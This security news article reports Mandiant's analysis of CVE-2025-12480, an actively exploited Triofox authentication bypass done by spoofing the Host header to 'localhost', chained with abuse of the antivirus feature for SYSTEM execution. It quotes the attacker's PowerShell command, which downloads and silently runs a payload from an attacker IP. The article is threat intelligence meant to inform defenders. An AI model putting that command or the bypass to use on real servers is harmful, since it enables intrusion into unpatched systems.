Critical Triofox Zero-Day (CVE-2025-12480) Under Active Exploit: Host Header Bypass Allows Unauthenticated Admin Takeover

Researchers at Mandiant Threat Defense, part of Google Cloud Security Operations, have revealed that a critical unauthenticated access vulnerability in Gladinet’s Triofox file-sharing platform has been actively exploited in the wild by a threat actor tracked as UNC6485. The vulnerability, now patched as CVE-2025-12480, allowed attackers to bypass authentication, create administrative accounts, and achieve SYSTEM-level code execution through a chained attack path.

The exploitation campaign was first detected on August 24, 2025, when Google Threat Intelligence Group (GTIG) observed UNC6485 leveraging the Triofox flaw in combination with abuse of the product’s built-in antivirus feature.

“As early as Aug. 24, 2025, a threat cluster tracked by Google Threat Intelligence Group (GTIG) as UNC6485 exploited the unauthenticated access vulnerability and chained it with the abuse of the built-in anti-virus feature to achieve code execution,” Mandiant wrote.

The attackers specifically targeted Triofox version 16.4.10317.56372, which was vulnerable until the issue was mitigated in version 16.7.10368.56560.

Mandiant confirmed that Gladinet has released a fix and “validated that this vulnerability is resolved in new versions of Triofox.”

Mandiant’s Google Security Operations (SecOps) platform detected anomalous activity indicating potential exploitation of Triofox servers. Analysts identified remote access utility deployment, RDP tunneling, and suspicious file activity in system directories such as C:\Windows\Temp.

“Within 16 minutes of beginning the investigation, Mandiant confirmed the threat and initiated containment of the host,” the report said.

During the investigation, analysts found that UNC6485 had exploited the flaw to gain access to the AdminDatabase.aspx configuration page — normally accessible only during initial software setup. From there, the attackers created a new administrative account called Cluster Admin to perform post-exploitation activities.

The root cause of CVE-2025-12480 was an insecure implementation of access control checks within the Triofox web interface. Mandiant found that access to critical configuration pages could be granted simply by spoofing the HTTP Host header to “localhost”, tricking the application into assuming the request was local.

“Changing the Host value to localhost grants access to the AdminDatabase.aspx page,” Mandiant explained, confirming that this bypassed all authentication checks.

Code analysis revealed that the function controlling access, CanRunCriticalPage(), failed to validate request origins and relied solely on the value of Request.Url.Host.

“The code presents several vulnerabilities,” Mandiant wrote. “Host Header attack – ASP.NET builds Request.Url from the HTTP Host header, which can be modified by an attacker. No Origin Validation – No check for whether the request came from an actual localhost connection versus a spoofed header.”

This design flaw effectively allowed unauthenticated attackers to run the setup process remotely, bypassing security controls that normally restrict these pages to local installations.

Once inside, the attackers used their newly created admin account to exploit Triofox’s antivirus configuration feature — a legitimate functionality that allows administrators to define a custom antivirus engine path.

By configuring this path to point to a malicious batch script, the attackers achieved code execution as SYSTEM, the highest level of privilege on Windows systems.

This abuse allowed the adversary to execute arbitrary commands and drop additional payloads directly onto the compromised server.

Mandiant observed the threat actor executing a PowerShell command via their malicious batch file to download and execute a second-stage payload masquerading as a legitimate software installer:

powershell -NoProfile -ExecutionPolicy Bypass -Command "$url = 'http://84.200.80[.]252/SAgentInstaller_16.7.10368.56560.zip'; $out = 'C:\\Windows\appcompat\SAgentInstaller_16.7.10368.56560.exe'; Invoke-WebRequest -Uri $url -OutFile $out; Start-Process $out -ArgumentList '/silent' -Wait"

The payload was a legitimate Zoho Unified Endpoint Management System (UEMS) installer that the attackers used to deploy Zoho Assist and AnyDesk remote access tools on the victim machine.

After establishing remote access, the attackers used PuTTY and Plink to create an SSH tunnel that redirected RDP traffic through encrypted channels on port 433.

Mandiant noted that this technique enabled covert persistence and bypassed network perimeter controls.

“These tools were used to set up an encrypted tunnel, connecting the compromised host to their command-and-control (C2) server over port 433 via SSH. The C2 server could then forward all traffic… allowing inbound RDP traffic,” the report said.

Related Posts:

• Beyond HTML: The Hidden Danger of Phishing in HTTP Response Headers
• Multiple Security Vulnerabilities Plague PHP, Exposing Applications to Risk
• Google Launches Unified Security Powered by Gemini AI, Enhances Enterprise Protection
• Mandiant Exposes Ongoing Exploits Against Citrix Users
• GitLab Patches High-Severity Flaws: Update Now to Prevent XSS and Account Takeover